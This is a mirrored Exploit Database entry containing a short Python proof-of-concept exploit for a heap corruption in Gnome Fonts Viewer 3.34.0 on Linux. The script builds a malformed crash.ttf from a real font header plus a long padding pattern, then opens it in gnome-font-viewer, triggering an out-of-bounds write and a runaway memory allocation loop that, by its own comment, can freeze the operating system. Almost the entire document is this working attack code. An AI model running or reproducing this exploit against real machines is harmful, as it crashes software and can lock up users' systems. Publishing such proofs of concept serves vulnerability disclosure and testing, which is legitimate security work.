Gnome Fonts Viewer 3.34.0 – Heap Corruption

• Exploit Database
• 126 阅读

• 作者： Cody Winkler
  日期： 2020-09-11
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/48803/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54

  #!/usr/bin/env python3 # Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption # Date: 2020-09-10 # Exploit Author: Cody Winkler # Vendor Homepage: gnome.org # Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html # Version: 3.34.0 # Tested On: Ubuntu 20.04.1 LTS # # Note: May take a few tries. Too many consecutive runs can freeze OS. # This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.   from os import system   this_pattern = "BEEF"*21125 # needs to be filled to len ~84500   # TTF file header (probably has some junk data in it) taken from MesloLGS NF Regular.ttf   ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54" "\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45" "\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f" "\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55" "\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f" "\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45" "\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61" "\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74" "\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67" "\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73" "\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79" "\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61" "\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65" "\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74" "\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63" "\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78" "\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d" "\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73" "\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65" "\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00" "\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08" "\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14" "\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a")   print('[+] Generating crash.ttf with DEADDEAD')   with open("./crash.ttf", 'w') as f: f.write(ttf_header) f.write(this_pattern) f.close() print('[+] Done')   print('[+] Triggering out-of-bounds write in gnome-font-viewer') system("/usr/bin/gnome-font-viewer ./crash.ttf")